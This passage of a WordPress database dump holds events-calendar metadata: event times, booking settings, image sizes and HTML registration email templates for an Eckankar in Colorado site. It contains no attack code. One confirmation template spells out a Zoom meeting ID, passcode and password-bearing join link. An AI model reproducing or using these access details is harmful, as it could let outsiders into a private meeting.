mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-16\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-16\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(179440,268210,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(179441,268210,'mec_certain_weekdays','a:0:{}'),(179442,268210,'mec_allday','0'),(179443,268210,'one_occurrence','0'),(179444,268210,'mec_hide_time','0'),(179445,268210,'mec_hide_end_time','0'),(179446,268210,'mec_comment',''),(179447,268210,'mec_timezone','global'),(179448,268210,'mec_countdown_method','global'),(179449,268210,'mec_public','1'),(179450,268210,'mec_start_date','2023-04-16'),(179451,268210,'mec_start_time_hour','1'),(179452,268210,'mec_start_time_minutes','0'),(179453,268210,'mec_start_time_ampm','PM'),(179454,268210,'mec_start_day_seconds','46800'),(179455,268210,'mec_end_date','2023-04-16'),(179456,268210,'mec_end_time_hour','2'),(179457,268210,'mec_end_time_minutes','30'),(179458,268210,'mec_end_time_ampm','PM'),(179459,268210,'mec_end_day_seconds','52200'),(179460,268210,'mec_repeat_status','0'),(179461,268210,'mec_repeat_type',''),(179462,268210,'mec_repeat_interval','1'),(179463,268210,'mec_repeat_end',''),(179464,268210,'mec_repeat_end_at_occurrences',''),(179465,268210,'mec_repeat_end_at_date',''),(179466,268210,'mec_advanced_days','a:0:{}'),(179467,268210,'mec_in_days',''),(179468,268210,'mec_not_in_days',''),(179469,268210,'mec_hourly_schedules','a:0:{}'),(179470,268210,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(179471,268210,'mec_tickets','a:0:{}'),(179472,268210,'mec_fees_global_inheritance','1'),(179473,268210,'mec_fees','a:0:{}'),(179474,268210,'mec_ticket_variations_global_inheritance','1'),(179475,268210,'mec_ticket_variations','a:0:{}'),(179476,268210,'mec_reg_fields_global_inheritance','1'),(179477,268210,'mec_reg_fields','a:0:{}'),(179478,268210,'mec_bfixed_fields','a:0:{}'),(179479,268210,'mec_op','a:0:{}'),(179480,268210,'mec_fields','a:0:{}'),(179481,268210,'mec_event_status','EventScheduled'),(179482,268210,'mec_moved_online_link',''),(179483,268210,'mec_cancelled_reason',''),(179484,268210,'mec_display_cancellation_reason_in_single_page',''),(179485,268210,'boldgrid_hide_page_title','0'),(179486,268210,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(179487,268210,'passster_activate_global_protection',NULL),(179488,268210,'passster_activate_protection',NULL),(179489,268210,'passster_protection_type','password'),(179490,268210,'boldgrid_in_page_containers','1'),(179491,268210,'passster_area_shortcode',''),(179492,268210,'_thumbnail_id','268211'),(179494,268210,'_dp_original','268208'),(179495,268210,'_edit_lock','1679102000:15'),(179496,268210,'_edit_last','15'),(179497,268211,'_wp_attached_file','2023/03/Compass.webp'),(179498,268211,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:20:\"2023/03/Compass.webp\";s:8:\"filesize\";i:15494;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"Compass-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8394;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Compass-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4748;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:20:\"Compass-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9894;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:20:\"Compass-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13914;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:20:\"Compass-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11332;}s:8:\"tileview\";a:5:{s:4:\"file\";s:20:\"Compass-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11584;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(179499,268213,'mec_color',''),(179500,268213,'mec_location_id','118'),(179501,268213,'mec_dont_show_map','0'),(179502,268213,'mec_organizer_id','1'),(179503,268213,'mec_read_more',''),(179504,268213,'mec_more_info',''),(179505,268213,'mec_more_info_title',''),(179506,268213,'mec_more_info_target','_self'),(179507,268213,'mec_cost',''),(179508,268213,'mec_currency','a:0:{}'),(179509,268213,'mec_additional_organizer_ids','a:0:{}'),(179510,268213,'mec_additional_location_ids','a:0:{}'),(179511,268213,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-05\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-05\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(179512,268213,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(179513,268213,'mec_certain_weekdays','a:0:{}'),(179514,268213,'mec_allday','0'),(179515,268213,'one_occurrence','0'),(179516,268213,'mec_hide_time','0'),(179517,268213,'mec_hide_end_time','0'),(179518,268213,'mec_comment',''),(179519,268213,'mec_timezone','global'),(179520,268213,'mec_countdown_method','global'),(179521,268213,'mec_public','1'),(179522,268213,'mec_start_date','2023-04-05'),(179523,268213,'mec_start_time_hour','7'),(179524,268213,'mec_start_time_minutes','0'),(179525,268213,'mec_start_time_ampm','PM'),(179526,268213,'mec_start_day_seconds','68400'),(179527,268213,'mec_end_date','2023-04-05'),(179528,268213,'mec_end_time_hour','8'),(179529,268213,'mec_end_time_minutes','0'),(179530,268213,'mec_end_time_ampm','PM'),(179531,268213,'mec_end_day_seconds','72000'),(179532,268213,'mec_repeat_status','0'),(179533,268213,'mec_repeat_type',''),(179534,268213,'mec_repeat_interval','1'),(179535,268213,'mec_repeat_end',''),(179536,268213,'mec_repeat_end_at_occurrences',''),(179537,268213,'mec_repeat_end_at_date',''),(179538,268213,'mec_advanced_days','a:0:{}'),(179539,268213,'mec_in_days',''),(179540,268213,'mec_not_in_days',''),(179541,268213,'mec_hourly_schedules','a:0:{}'),(179542,268213,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"0\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"0\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"0\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(179543,268213,'mec_tickets','a:0:{}'),(179762,268243,'one_occurrence','0'),(179763,268243,'mec_hide_time','0'),(179764,268243,'mec_hide_end_time','0'),(179765,268243,'mec_comment',''),(179766,268243,'mec_timezone','global'),(179767,268243,'mec_countdown_method','global'),(179768,268243,'mec_public','1'),(179769,268243,'mec_start_date','2023-04-03'),(179770,268243,'mec_start_time_hour','6'),(179544,268213,'mec_fees_global_inheritance','1'),(179545,268213,'mec_fees','a:0:{}'),(179546,268213,'mec_ticket_variations_global_inheritance','1'),(179547,268213,'mec_ticket_variations','a:0:{}'),(179548,268213,'mec_reg_fields_global_inheritance','0'),(179549,268213,'mec_reg_fields','a:4:{i:0;a:3:{s:9:\"mandatory\";s:1:\"1\";s:4:\"type\";s:9:\"mec_email\";s:5:\"label\";s:5:\"Email\";}i:1;a:3:{s:9:\"mandatory\";s:1:\"1\";s:4:\"type\";s:4:\"name\";s:5:\"label\";s:4:\"Name\";}s:3:\":i:\";a:8:{s:9:\"mandatory\";s:1:\"1\";s:4:\"type\";s:1:\"p\";s:5:\"label\";s:15:\"I agree with %s\";s:7:\"mapping\";s:0:\"\";s:6:\"ignore\";s:1:\"0\";s:4:\"page\";s:6:\"126730\";s:6:\"status\";s:7:\"checked\";s:7:\"content\";s:0:\"\";}s:4:\":fi:\";a:1:{s:7:\"options\";a:1:{s:3:\":i:\";a:1:{s:5:\"label\";s:0:\"\";}}}}'),(179550,268213,'mec_bfixed_fields','a:2:{s:3:\":i:\";a:7:{s:9:\"mandatory\";s:1:\"1\";s:4:\"type\";s:1:\"p\";s:5:\"label\";s:15:\"I agree with %s\";s:6:\"ignore\";s:1:\"0\";s:4:\"page\";s:6:\"126730\";s:6:\"status\";s:7:\"checked\";s:7:\"content\";s:0:\"\";}s:4:\":fi:\";a:1:{s:7:\"options\";a:1:{s:3:\":i:\";a:1:{s:5:\"label\";s:0:\"\";}}}}'),(179551,268213,'mec_op','a:0:{}'),(179552,268213,'mec_fields','a:0:{}'),(179553,268213,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9934:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" 